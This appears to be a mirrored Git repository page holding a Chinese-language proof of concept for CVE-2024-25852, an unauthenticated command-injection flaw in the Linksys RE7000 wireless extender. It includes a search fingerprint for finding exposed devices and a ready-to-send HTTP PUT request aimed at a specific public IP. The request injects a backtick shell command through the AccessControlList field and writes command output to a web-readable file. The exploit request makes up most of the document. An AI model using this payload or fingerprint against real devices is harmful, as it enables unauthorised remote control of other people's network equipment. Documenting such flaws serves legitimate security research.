admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-07-10 00:13:36 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/Linksys/Linksys-RE7000无线扩展器RCE(CVE-2024-25852).md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

43 lines
1.7 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Linksys-RE7000无线扩展器RCE(CVE-2024-25852)
### 一、漏洞描述
<font style="color:#000000;">Linksys RE7000无线扩展器在访问控制功能点的AccessControlList参数中存在命令执行漏洞。未经身份验证的远程攻击者可以利用该漏洞获取设备管理员权限。</font>
### 二、影响版本
<font style="color:#000000;">Linksys RE7000无线扩展器</font>
### 三、资产测绘
body="/login.shtml?ran="
![1718333560229-60861c15-6d19-413d-86ff-12a39b9c2c6d.png](./img/vv1PxtfgpgbamSsw/1718333560229-60861c15-6d19-413d-86ff-12a39b9c2c6d-984843.png)
界面
![1718333587335-4900165d-3c0a-4a16-8a8f-b793b87f79c8.png](./img/vv1PxtfgpgbamSsw/1718333587335-4900165d-3c0a-4a16-8a8f-b793b87f79c8-026376.png)
### 四、漏洞复现
```plain
PUT /goform/AccessControl HTTP/1.1
Host: 121.137.162.121
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 87
{"AccessPolicy":"0","AccessControlList":"`ip a>/etc_ro/lighttpd/RE7000_www/qqi.txt`"}
```
构造语句进行发送
![1718333420542-224485fe-1557-444d-988e-e192f2531b3a.png](./img/vv1PxtfgpgbamSsw/1718333420542-224485fe-1557-444d-988e-e192f2531b3a-604259.png)访问qqi.txt这个文件获取相关信息。
![1718333496307-c39af445-f271-4b7f-838a-d9a88beee01f.png](./img/vv1PxtfgpgbamSsw/1718333496307-c39af445-f271-4b7f-838a-d9a88beee01f-602094.png)
> 更新: 2024-06-23 23:46:34
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zdaghns0azgvr8ns>
Reference in New Issue View Git Blame Copy Permalink